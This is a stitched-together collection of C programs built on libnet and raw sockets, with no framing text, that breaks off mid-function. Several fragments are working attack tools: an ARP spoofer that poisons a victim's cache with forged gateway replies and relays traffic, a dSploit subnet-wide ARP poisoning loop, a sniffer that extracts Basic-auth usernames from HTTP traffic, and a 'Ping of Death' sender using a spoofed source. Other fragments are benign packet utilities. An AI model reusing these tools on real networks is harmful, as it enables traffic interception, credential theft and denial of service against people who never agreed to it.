frame header. // Ethernet frame length = ethernet header (MAC + MAC + ethernet type) + ethernet data (ARP header) frame_length = LIBNET_ETH_H + LIBNET_ARP_ETH_IP_H; // Set destination MAC address: broadcast address dst_mac = (uint8_t *)malloc(6 * sizeof(uint8_t)); memset(dst_mac, 0xff, 6 * sizeof(uint8_t)); // Destination and Source MAC addresses memcpy(ether_frame, dst_mac, 6 * sizeof(uint8_t)); memcpy(ether_frame + 6, mac_addr->ether_addr_octet, 6 * sizeof(uint8_t)); // Next is ethernet type code (ETH_P_ARP for ARP). ether_frame[12] = ETHERTYPE_ARP / 256; ether_frame[13] = ETHERTYPE_ARP % 256; // Next is ethernet frame data (ARP header). // ARP header memcpy(ether_frame + LIBNET_ETH_H, &arphdr_send, LIBNET_ARP_ETH_IP_H * sizeof(uint8_t)); // Submit request for a raw socket descriptor. if ((sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("socket() failed "); exit(EXIT_FAILURE); } // struct sockaddr_ll device, which will be used as an argument of sendto(). memset(&device, 0, sizeof(device)); if ((device.sll_ifindex = if_nametoindex("ens33")) == 0) { perror("if_nametoindex() failed to obtain interface index "); exit(EXIT_FAILURE); } // Fill out sockaddr_ll. device.sll_family = AF_PACKET; memcpy(device.sll_addr, mac_addr, 6 * sizeof(uint8_t)); device.sll_halen = 6; // Send ethernet frame to socket. if ((bytes = sendto(sd, ether_frame, frame_length, 0, (struct sockaddr *) &device, sizeof(device))) <= 0) { perror("sendto() failed"); exit(EXIT_FAILURE); } ///////////////////////////// 2. receive packet /////////////////////// while (((((ether_frame2[12]) << 8) + ether_frame2[13]) != ETH_P_ARP) || (ntohs(arphdr_receive->opcode) != ARPOP_REPLY)) { if ((recv(sd2, ether_frame2, IP_MAXPACKET, 0)) < 0) { if (errno == EINTR) { memset(ether_frame2, 0, IP_MAXPACKET * sizeof(uint8_t)); continue; } else { perror("recv() failed:"); exit(EXIT_FAILURE); } } } ////////////////// print received packet /////////////////// // Print out contents of received ethernet frame. printf("\n [+]PRINT REPLY_PACKET"); printf("\nEthernet frame header:\n"); printf("Destination MAC (this node): "); int i = 0; for (i = 0; i < 5; i++) { printf("%02x:", ether_frame2[i]); } printf("%02x\n", ether_frame2[5]); printf("Source MAC: "); for (i = 0; i < 5; i++) { printf("%02x:", ether_frame2[i + 6]); } printf("%02x\n", ether_frame2[11]); // Next is ethernet type code (ETH_P_ARP for ARP). printf("Ethernet type code (2054 = ARP): %u\n", ((ether_frame2[12]) << 8) + ether_frame2[13]); printf("Ethernet data (ARP header):\n"); printf("Hardware type (1 = ethernet (10 Mb)): %u\n", ntohs(arphdr_receive->htype)); printf("Protocol type (2048 for IPv4 addresses): %u\n", ntohs(arphdr_receive->ptype)); printf("Hardware (MAC) address length (bytes): %u\n", arphdr_receive->hlen); printf("Protocol (IPv4) address length (bytes): %u\n", arphdr_receive->plen); printf("Opcode (2 = ARP reply): %u\n", ntohs(arphdr_receive->opcode)); printf("Sender hardware (MAC) address: "); for (i = 0; i < 5; i++) { printf("%02x:", arphdr_receive->sender_mac[i]); } printf("%02x\n", arphdr_receive->sender_mac[5]); printf("Sender protocol (IPv4) address: %u.%u.%u.%u\n", arphdr_receive->sender_ip[0], arphdr_receive->sender_ip[1], arphdr_receive->sender_ip[2], arphdr_receive->sender_ip[3]); printf("Target hardware (MAC) address: "); for (i = 0; i < 5; i++) { printf("%02x:", arphdr_receive->target_mac[i]); } printf("%02x\n", arphdr_receive->target_mac[5]); printf("Target protocol (IPv4) address: %u.%u.%u.%u\n", arphdr_receive->target_ip[0], arphdr_receive->target_ip[1], arphdr_receive->target_ip[2], arphdr_receive->target_ip[3]); printf("\n"); ////////////////////// 3.send spoofing packet ///////////////////////////////////// arp_hdr arphdr_spoof; uint8_t *ether_frame3; ether_frame3 = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t)); memset(ether_frame3, 0, IP_MAXPACKET * sizeof(uint8_t)); // ARP header (request) // target mac = victim // sender mac = attacker // target ip = victim // sender ip = gateway // dst mac = victim mac // src mac = attacter mac // Hardware type (16 bits): 1 for ethernet // arp_request_hdr.ar_hrd = htons(ARPHRD_ETHER); arphdr_spoof.htype = htons(ARPHRD_ETHER); // Protocol type (16 bits): 2048 for IP arphdr_spoof.ptype = htons(ETHERTYPE_IP); // Hardware address length (8 bits): 6 bytes for MAC address arphdr_spoof.hlen = 6; // Protocol address length (8 bits): 4 bytes for IPv4 address arphdr_spoof.plen = 4; // OpCode: 1 for ARP request arphdr_spoof.opcode = htons(ARPOP_REPLY); // Sender hardware address (48 bits): MAC address memcpy(&arphdr_spoof.sender_mac, &arphdr_send.sender_mac, 6 * sizeof(uint8_t)); // Sender protocol address (32 bits) : gateway address memcpy(arphdr_spoof.sender_ip, &gw_ip_addr, 4 * sizeof(uint8_t)); // See getaddrinfo() resolution of src_ip;. // Target hardware address (48 bits): victim address memcpy(&arphdr_spoof.target_mac, arphdr_receive->sender_mac , 6 * sizeof(uint8_t) ); // Target protocol address (32 bits) memcpy(&arphdr_spoof.target_ip, &arphdr_send.target_ip, 4 * sizeof(uint8_t)); // Fill out ethernet frame header. // Ethernet frame length = ethernet header (MAC + MAC + ethernet type) + ethernet data (ARP header) frame_length = LIBNET_ETH_H + LIBNET_ARP_ETH_IP_H; // Set destination MAC address: broadcast address uint8_t *dst_mac_spf; dst_mac_spf = (uint8_t *)malloc(6 * sizeof(uint8_t)); memcpy(dst_mac_spf, arphdr_receive->sender_mac, 6 * sizeof(uint8_t)); // Destination and Source MAC addresses memcpy(ether_frame3, arphdr_receive->sender_mac, 6 * sizeof(uint8_t)); memcpy(ether_frame3 + 6, arphdr_receive->target_mac, 6 * sizeof(uint8_t)); // Next is ethernet type code (ETH_P_ARP for ARP). // http://www.iana.org/assignments/ethernet-numbers ether_frame3[12] = ETHERTYPE_ARP / 256; ether_frame3[13] = ETHERTYPE_ARP % 256; // Next is ethernet frame data (ARP header). // ARP header memcpy(ether_frame3 + LIBNET_ETH_H, &arphdr_spoof, LIBNET_ARP_ETH_IP_H * sizeof(uint8_t)); // Submit request for a raw socket descriptor. if ((sd3 = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("socket() failed "); exit(EXIT_FAILURE); } // Find interface index from interface name and store index in // struct sockaddr_ll device, which will be used as an argument of sendto(). memset(&device, 0, sizeof(device)); if ((device.sll_ifindex = if_nametoindex("ens33")) == 0) { perror("if_nametoindex() failed to obtain interface index "); exit(EXIT_FAILURE); } // Fill out sockaddr_ll. device.sll_family = AF_PACKET; memcpy(device.sll_addr, mac_addr, 6 * sizeof(uint8_t)); device.sll_halen = 6; printf("\n [+]SEND SPOOFING PACKET \n"); char *mac_buff; mac_buff = (char *)malloc(17 * sizeof(char)); //Parameter param; spoof_P.sd = sd3; spoof_P.ether_frame = ether_frame3; spoof_P.frame_length = frame_length; spoof_P.device = device; arp_hdr pk; pk.htype = htons(ARPHRD_ETHER); pk.ptype = htons(ETHERTYPE_IP); pk.hlen = 6; //6 bytes for MAC address pk.plen = 4; //4 bytes for IPv4 address pk.opcode=htons(ARPOP_REQUEST); memcpy(pk.sender_mac, arphdr_spoof.target_mac, 6 * sizeof(uint8_t)); memcpy(pk.sender_ip, arphdr_spoof.target_ip, 4 * sizeof(uint8_t)); memcpy(pk.target_mac, arphdr_spoof.sender_mac, 6 * sizeof(uint8_t)); memcpy(pk.target_ip, arphdr_spoof.sender_ip, 4 * sizeof(uint8_t)); thr_id = pthread_create(&p_thread[0], NULL, send_packet, (void *)&spoof_P); //send infected packet thr_id2 = pthread_create(&p_thread[1], NULL, relay_packet, (void *)&pk); // relay infected packet pthread_join(p_thread[0],NULL); pthread_join(p_thread[1],NULL); free(mac_buff); free(dst_mac); free(ether_frame); free(ether_frame2); close(sd); close(sd2); close(sd3); return (EXIT_SUCCESS); }
int process_http_request(struct tuple4 *addr, u_char *data, int len) { struct buf *msg, buf; char *p, *req, *uri, *user, *vhost, *referer, *agent; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&buf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&buf, 4); if (!regex_match(buf_ptr(msg))) continue; if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) continue; if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; if ((uri = strchr(req, ' ')) == NULL) continue; *uri++ = '\0'; user = vhost = referer = agent = NULL; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { p += 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; user = p; if ((p = strchr(p, ':')) != NULL) *p = '\0'; } else if (strncasecmp(p, "Host: ", 6) == 0) { vhost = p + 6; } else if (strncasecmp(p, "Referer: ", 9) == 0) { referer = p + 9; } else if (strncasecmp(p, "User-Agent: ", 12) == 0) { agent = p + 12; } else if (strncasecmp(p, "Content-length: ", 16) == 0) { i = atoi(p + 16); buf_tok(NULL, NULL, i); } } if (user == NULL) user = "******"; if (vhost == NULL) vhost = "none";// libnet_host_lookup(addr->daddr, Opt_dns); if (referer == NULL) referer = "-"; if (agent == NULL) agent = "-"; printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n", //"0.0.0.0", libnet_addr2name4(addr->saddr, Opt_dns), user, timestamp(), req, vhost, uri, referer, agent); } fflush(stdout); return (len - buf_len(&buf)); }
int main(int argc, char *argv[]) { char *intf; u_long src_ip, options_len, orig_len; int i; libnet_t *l; libnet_ptag_t t; libnet_ptag_t ip; libnet_ptag_t udp; libnet_ptag_t dhcp; struct libnet_ether_addr *ethaddr; struct libnet_stats ls; char errbuf[LIBNET_ERRBUF_SIZE]; u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME }; u_char *options; u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; u_char *tmp; // have to specify interface if (argc != 2) usage(argv[0]); intf = argv[1]; l = libnet_init( LIBNET_LINK, // injection type intf, // network interface errbuf); // errbuf if (!l) { fprintf(stderr, "libnet_init: %s", errbuf); exit(EXIT_FAILURE); } else { src_ip = libnet_get_ipaddr4(l);; if ((ethaddr = libnet_get_hwaddr(l)) == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l)); exit(EXIT_FAILURE); } printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE)); printf("eth addr : "); for (i = 0; i < 6; i++) { printf("%x", ethaddr->ether_addr_octet[i]); if (i != 5) { printf(":"); } } printf("\n"); // build options packet i = 0; options_len = 3; // update total payload size // we are a discover packet options = malloc(3); options[i++] = LIBNET_DHCP_MESSAGETYPE; // type options[i++] = 1; // len options[i++] = LIBNET_DHCP_MSGDISCOVER; // data orig_len = options_len; options_len += sizeof(options_req) + 2; // update total payload size // workaround for realloc on old machines // options = realloc(options, options_len); // resize options buffer tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; // we are going to request some parameters options[i++] = LIBNET_DHCP_PARAMREQUEST; // type options[i++] = sizeof(options_req); // len memcpy(options + i, options_req, sizeof(options_req)); // data i += sizeof(options_req); // if we have an ip already, let's request it. if (src_ip) { orig_len = options_len; options_len += 2 + sizeof(src_ip); // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; options[i++] = LIBNET_DHCP_DISCOVERADDR; // type options[i++] = sizeof(src_ip); // len memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data i += sizeof(src_ip); } // end our options packet options[i] = LIBNET_DHCP_END; // make sure we are at least the minimum length, if not fill // this could go in libnet, but we will leave it in the app for now if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN) { orig_len = options_len; options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H; // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; memset(options + i, 0, options_len - i); } // the goodies are here dhcp = libnet_build_dhcpv4( LIBNET_DHCP_REQUEST, // opcode 1, // hardware type 6, // hardware address length 0, // hop count 0xdeadbeef, // transaction id 0, // seconds since bootstrap 0x8000, // flags 0, // client ip 0, // your ip 0, // server ip 0, // gateway ip ethaddr->ether_addr_octet, // client hardware addr NULL, // server host name NULL, // boot file options, // dhcp options stuck in payload since it is dynamic options_len, // length of options l, // libnet handle 0); // libnet id // wrap it udp = libnet_build_udp( 68, // source port 67, // destination port LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size 0, // checksum NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // hook me up with some ipv4 ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // length 0x10, // TOS 0, // IP ID 0, // IP Frag 16, // TTL IPPROTO_UDP, // protocol 0, // checksum src_ip, // src ip inet_addr("255.255.255.255"), // destination ip NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // we can just autobuild since we arent doing anything tricky t = libnet_autobuild_ethernet( enet_dst, // ethernet destination ETHERTYPE_IP, // protocol type l); // libnet handle // write to the wire if (libnet_write(l) == -1) { fprintf(stderr, " %s: libnet_write: %s\n", argv[0], strerror(errno)); exit(EXIT_FAILURE); } // fill and print stats libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); // free mem free(options); exit(0); } exit(0); }
int main(int argc, char *argv[]) { int c; u_long i; libnet_t *l; char *device = NULL; struct libnet_ether_addr *e; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 address getter\n"); while ((c = getopt(argc, argv, "i:")) != EOF) { switch (c) { case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_LINK, /* injection type */ device, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } printf("Interface %s\n", libnet_getdevice(l)); e = libnet_get_hwaddr(l); if (e == NULL) { fprintf(stderr, "Can't get hardware address: %s\n", libnet_geterror(l)); } else { printf("MAC address: "); for (c = 0; c < 6; c++) { printf("%x", e->ether_addr_octet[c]); if (c != 5) { printf(":"); } } printf("\n"); } i = libnet_get_ipaddr4(l); if (i == -1) { fprintf(stderr, "Can't get ip address: %s\n", libnet_geterror(l)); } else { printf("IP address: "); printf("%s\n", libnet_addr2name4(i, LIBNET_DONT_RESOLVE)); } exit(EXIT_SUCCESS); }
/* Send an ICMP packet, such as host unreachable, to the source and destination addresses */ void rst_icmp_send(pkt_t *rst) { struct ip *ih = NULL; struct tcphdr *th = NULL; int pair = 0; char *state = NULL; size_t icmp_len = 0; ih = (struct ip *)(rst->pkt + sizeof(struct ether_header)); th = (struct tcphdr *)(rst->pkt + sizeof(struct ether_header) + sizeof(struct ip)); /* The interface described in "Building Open Source Network Security Tools" * appears to be deprecated. The new interface tunnels an IPv4 packet * within the ICMP unreachable using the libnet context. */ switch (rst->icmp.type) { /* RFC 792 * * Type 3 * * Codes 0, 1, 4, and 5 may be received from a gateway. Codes 2 and * 3 may be received from a host. * * 0 = net unreachable; * 1 = host unreachable; * 2 = protocol unreachable; * 3 = port unreachable; * 4 = fragmentation needed and DF set; * 5 = source route failed. * */ case ICMP_UNREACH: icmp_len = LIBNET_ICMPV4_UNREACH_H + LIBNET_IPV4_H + ICMP_PKTLEN; LIBNET_ERR(libnet_build_icmpv4_unreach( rst->icmp.type, /* ICMP type, e.g. 3 (Unreachable) */ rst->icmp.code, /* ICMP code, e.g., 1 (Bad Host) */ 0, /* auto checksum */ (u_char *)ih, /* payload */ LIBNET_IPV4_H + ICMP_PKTLEN, /* payload size */ rst->l, /* libnet context */ 0 /* ptag */ )); break; /* * Type 5 * * Codes 0, 1, 2, and 3 may be received from a gateway. * * 0 = Redirect datagrams for the Network. * 1 = Redirect datagrams for the Host. * 2 = Redirect datagrams for the Type of Service and Network. * 3 = Redirect datagrams for the Type of Service and Host. * */ case ICMP_REDIRECT: icmp_len = LIBNET_ICMPV4_REDIRECT_H; LIBNET_ERR(libnet_build_icmpv4_unreach( rst->icmp.type, rst->icmp.code, 0, (u_char *)ih, LIBNET_IPV4_H + ICMP_PKTLEN, rst->l, 0)); break; /* * Type 11 * * Code 0 may be received from a gateway. Code 1 may be received * from a host. * * 0 = time to live exceeded in transit * 1 = fragment reassembly time exceeded * */ case ICMP_TIMXCEED: icmp_len = LIBNET_ICMPV4_TIMXCEED_H + LIBNET_IPV4_H + ICMP_PKTLEN; LIBNET_ERR(libnet_build_icmpv4_timeexceed( rst->icmp.type, rst->icmp.code, 0, (u_char *)ih, LIBNET_IPV4_H + ICMP_PKTLEN, rst->l, 0)); break; case ICMP_PARAMPROB: case ICMP_SOURCEQUENCH: errx(EXIT_FAILURE, "Not supported by libnet."); break; default: errx(EXIT_FAILURE, "ICMP type %d is not supported yet\n", rst->icmp.type); } LIBNET_ERR(libnet_build_ipv4( LIBNET_IPV4_H + icmp_len, /* payload size */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* TOS */ ntohs(ih->ip_id)+1, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_ICMP, /* Protocol */ 0, /* auto checksum */ ih->ip_dst.s_addr, /* source */ ih->ip_src.s_addr, /* destination */ NULL, /* payload */ 0, /* payload size */ rst->l, /* libnet context */ 0 /* libnet ptag */ )); state = ((libnet_write(rst->l) == -1) ? "x" : "I"); (void)fprintf(stdout, "[%s] SRC = %15s:%-6u DST = %15s:%-6u len = %d/%d\n", state, libnet_addr2name4(PAIR(pair, ih->ip_src.s_addr, ih->ip_dst.s_addr), LIBNET_DONT_RESOLVE), PAIR(pair, ntohs(th->th_sport), ntohs(th->th_dport)), libnet_addr2name4(PAIR(pair, ih->ip_dst.s_addr, ih->ip_src.s_addr), LIBNET_DONT_RESOLVE), PAIR(pair, ntohs(th->th_dport), ntohs(th->th_sport)), LIBNET_IPV4_H + (u_int32_t)icmp_len, ntohs(ih->ip_len)); (void)fflush(stdout); usleep(rst->sleep_for); }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char pcap_ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; int c, netmask = 0, ifaddr = 0, nhosts = 0, i = 0; network_entry_t *entry; iface = NULL; gateway_ip = target_ip = 0; printf( "dSploit ArpSpoofer.\n\n" ); while( (c = getopt(argc, argv, "i:t:h?V")) != -1) { switch (c) { case 'i': iface = optarg; break; case 't': if ((target_ip = libnet_name2addr4(lnet, optarg, LIBNET_RESOLVE)) == -1) exit(1); break; default: return 1; } } argc -= optind; argv += optind; if (argc != 1) return 1; if( ( gateway_ip = libnet_name2addr4( lnet, argv[0], LIBNET_RESOLVE ) ) == -1 ) { printf( "[ERROR] Unable to resolve gateway ip.\n" ); return 1; } if( iface == NULL && (iface = pcap_lookupdev(pcap_ebuf)) == NULL ) { printf( "[ERROR] Unable to lookup network interface ( %s ).\n", pcap_ebuf ); return 1; } if( ( lnet = libnet_init(LIBNET_LINK, iface, libnet_ebuf) ) == NULL ) { printf( "[ERROR] Unable to initialize libnet ( %s ).\n", libnet_ebuf ); return 1; } signal( SIGHUP, cleanup ); signal( SIGINT, cleanup ); signal( SIGTERM, cleanup ); our_mac = ( struct ether_addr * )libnet_get_hwaddr( lnet ); if( our_mac == NULL ) { printf( "[ERROR] Unable to retrieve local hardware address libnet ( %s ).\n", libnet_geterror( lnet ) ); return 1; } if( net_get_details( iface, &netmask, &ifaddr, &nhosts ) != 0 ) exit( 1 ); printf( "netmask = %s\n", inet_ntoa( *( struct in_addr *)&netmask ) ); printf( "ifaddr = %s\n", inet_ntoa( *( struct in_addr *)&ifaddr ) ); printf( "gateway = %s\n", inet_ntoa( *( struct in_addr *)&gateway_ip ) ); printf( "hosts = %d\n", nhosts ); // force the arp cache to be populated net_wake( iface, nhosts, ifaddr, netmask, gateway_ip ); // if the target is the gateway itself, we switch to subnet mode, // otherwise if the target was set, we are in single ip spoofing mode. if( target_ip != 0 && target_ip != gateway_ip ) { if( target_ip != 0 && arp_lookup( target_ip, &target_mac, iface ) != 0 ) { printf( "[ERROR] Couldn't find a cached MAC address for %s, try to wait a little bit and then try again or restart the network discovery.\n", libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE) ); return 1; } printf( "\nSingle target mode.\n" ); while( killed == 0 ) { arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&target_mac, target_ip ); sleep(1); } } // whole network spoofing else { printf( "\nSubnet mode.\n" ); netmap = net_get_mapping( iface, nhosts, ifaddr, netmask, gateway_ip, &i ); if( i == 0 ) { printf( "[ERROR] No alive endpoints found.\n" ); return 1; } while( killed == 0 ) { for( i = 1; i <= nhosts && killed == 0; i++ ) { target_ip = ( ifaddr & netmask ) | htonl(i); entry = hashmapGet( netmap, (void *)target_ip ); if( entry && killed == 0 ) { arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&entry->mac, target_ip ); } } sleep(1); } } return 0; }
int main(int argc, char **argv) { libnet_t *l; libnet_ptag_t ip; libnet_ptag_t icmp; struct libnet_stats ls; u_long fakesrc, target; u_char *data; int c, i, flags, offset, len; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 Ping of Death[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s\n", errbuf); exit(EXIT_FAILURE); } if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(EXIT_FAILURE); } /* get random src addr. */ libnet_seed_prand(l); fakesrc = libnet_get_prand(LIBNET_PRu32); data = malloc(FRAG_LEN); for (i = 0 ; i < FRAG_LEN ; i++) { /* fill it with something */ data[i] = 0x3a; } ip = LIBNET_PTAG_INITIALIZER; icmp = LIBNET_PTAG_INITIALIZER; for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else { /* for a total reconstructed length of 65538 bytes */ len = 410; } icmp = libnet_build_icmpv4_echo( ICMP_ECHO, /* type */ 0, /* code */ 0, /* checksum */ 666, /* id */ 666, /* sequence */ data, /* payload */ len, /* payload size */ l, /* libnet handle */ icmp); /* libnet ptag */ if (icmp == -1) { fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l)); goto bad; } /* no reason to do this */ libnet_toggle_checksum(l, icmp, 0); ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */ 0, /* TOS */ 666, /* IP ID */ flags | (offset >> 3), /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ fakesrc, /* source IP */ target, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ ip); /* libnet ptag */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); } /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0), argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : ""); } libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %lld\n" "Packet errors: %lld\n" "Bytes written: %lld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); free(data); return (EXIT_SUCCESS); bad: libnet_destroy(l); free(data); return (EXIT_FAILURE); }
static void dump_dhcp_packet(struct libnet_dhcpv4_hdr *dhcp_hdr) { int i, entry; char opt_buf[1024]; printf(" - beginning of dump -\n"); printf("DHCP operation : "); switch (dhcp_hdr->dhcp_opcode) { case LIBNET_DHCP_REQUEST: printf("request\n"); break; case LIBNET_DHCP_REPLY: printf("reply\n"); break; default: printf("unknown code 0x%x\n", dhcp_hdr->dhcp_opcode); } printf("Hardware type : "); switch (dhcp_hdr->dhcp_htype) { case 1: printf("ethernet\n"); break; default: printf("unknown code 0x%x\n", dhcp_hdr->dhcp_htype); } printf("Hardware address length : %d bytes\n", dhcp_hdr->dhcp_hlen); printf("Hop count : %d\n", dhcp_hdr->dhcp_hopcount); printf("Transaction ID : 0x%x\n", ntohl(dhcp_hdr->dhcp_xid)); printf("Number of seconds : %d\n", ntohs(dhcp_hdr->dhcp_secs)); printf("Flags : 0x%x\n", ntohs(dhcp_hdr->dhcp_flags)); printf("Client IP : %s\n", libnet_addr2name4(dhcp_hdr->dhcp_cip, LIBNET_DONT_RESOLVE)); printf("Your IP : %s\n", libnet_addr2name4(dhcp_hdr->dhcp_yip, LIBNET_DONT_RESOLVE)); printf("Server IP : %s\n", libnet_addr2name4(dhcp_hdr->dhcp_sip, LIBNET_DONT_RESOLVE)); printf("Gateway IP : %s\n", libnet_addr2name4(dhcp_hdr->dhcp_gip, LIBNET_DONT_RESOLVE)); printf("Client hw addr : "); for (i = 0; i < dhcp_hdr->dhcp_hlen; i++) { printf("%2.2x", dhcp_hdr->dhcp_chaddr[i]); if (dhcp_hdr->dhcp_hlen != (i + 1)) printf(":"); } printf("\n"); printf("Server hostname : %s\n", dhcp_hdr->dhcp_sname); printf("Boot filename : %s\n", dhcp_hdr->dhcp_file); printf("Options\n"); printf(" Magic header : 0x%X (%s)\n", ntohl(dhcp_hdr->dhcp_magic), (ntohl(dhcp_hdr->dhcp_magic) == DHCP_MAGIC) ? "OK" : "Corrupt"); options = (uint8_t *) ((intptr_t)(&(dhcp_hdr->dhcp_magic)) + 4); while ((*options != LIBNET_DHCP_END)) { /* find option entry in table */ for (entry=0; (dot[entry].id != *options) && (dot[entry].id != 0xff); entry++) { } if (dot[entry].id == 0xff) { printf("parsed to end of tag list\n"); break; } /* parse option value and print out accordingly */ switch (dot[entry].type) { case 1: memset(opt_buf, 0, sizeof(opt_buf)); strncpy(opt_buf, options + 2, *(options + 1)); printf(" %16.16s : %s\n", dot[entry].label, opt_buf); break; case 2: for (i = 0; i < (*(options + 1)); i += 4) { printf(" %16.16s : %s\n", dot[entry].label, libnet_addr2name4(*(uint32_t *) (options + 2 + i), LIBNET_DONT_RESOLVE)); } break; case 4: printf(" Message type : "); switch (dhcp_hdr->dhcp_opcode) { case LIBNET_DHCP_MSGDISCOVER: printf("discover\n"); break; case LIBNET_DHCP_MSGOFFER: printf("offer\n"); break; case LIBNET_DHCP_MSGREQUEST: printf("request\n"); break; case LIBNET_DHCP_MSGDECLINE: printf("decline\n"); break; case LIBNET_DHCP_MSGACK: printf("ack\n"); break; case LIBNET_DHCP_MSGNACK: printf("nack\n"); break; case LIBNET_DHCP_MSGRELEASE: printf("release\n"); break; case LIBNET_DHCP_MSGINFORM: printf("inform\n"); break; } break; case 5: printf(" %16.16s : %u seconds\n", dot[entry].label, ntohl(*(uint32_t *) (options + 2))); break; case 0: default: printf(" Option 0x%X : len %d\n", *options, *(options + 1)); } options += *(options + 1) + 2; } printf(" - end of dump -\n"); }
int main (int argc, char **argv) { int c, valid, bnr = 9, showpopup = 0, flags = 0; /* temporary vars */ char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */ libnet_t *l; /* libnet handle for address retrieval */ char libnet_errbuf[LIBNET_ERRBUF_SIZE]; /* libnet error messages */ char start_time[24], end_time[24]; time_t acurtime, bcurtime; struct tm *aloctime, *bloctime; struct configuration conf, *config=&conf; /* struct to hold config for current session */ struct validated_queue *start = NULL, *end = NULL; /* pointers to validated queue */ /* get current system time */ acurtime = time (NULL); /* convert it to local time representation */ aloctime = localtime (&acurtime); /* format time struct into a char array */ strftime (start_time, 24, "%d/%b/%Y %H:%M:%S", aloctime); /* load default params in config struct */ config->flags = 0; config->verbose = 0; config->queue_size = 0; config->dev = NULL; config->dport = HTTP; config->mode = DETECT; config->gtimeout = TIME_OUT; config->scan_type = SYN_SCAN; config->a_port_name = "HTTP"; config->a_scan_type = "SYN_SCAN"; /* parse and load cmd-line params in config struct */ while ((c = getopt (argc, argv, "hi:p:Parsfuetvg:o")) != -1) { switch (c) { case 'h': print_usage (); exit (EXIT_SUCCESS); case 'i': config->dev = optarg; break; case 'p': if (1 <= atoi (optarg) && 65535 >= atoi (optarg)) { config->dport = atoi (optarg); } break; case 'P': config->mode = PREVENT; break; case 'a': config->scan_type = ACK_SCAN; config->flags = config->flags | ACK; flags = flags | ACK; break; case 'r': config->scan_type = RST_SCAN; config->flags = config->flags | RST; flags = flags | RST; break; case 's': config->scan_type = SYN_SCAN; config->flags = config->flags | SYN; flags = flags | SYN; break; case 'f': config->scan_type = FIN_SCAN; config->flags = config->flags | FIN; flags = flags | FIN; break; case 'u': config->scan_type = UDP_SCAN; config->a_scan_type = "UDP_SCAN"; break; case 'e': config->scan_type = ECHO_SCAN; config->a_scan_type = "ECHO_SCAN"; break; case 't': config->scan_type = TSTAMP_SCAN; 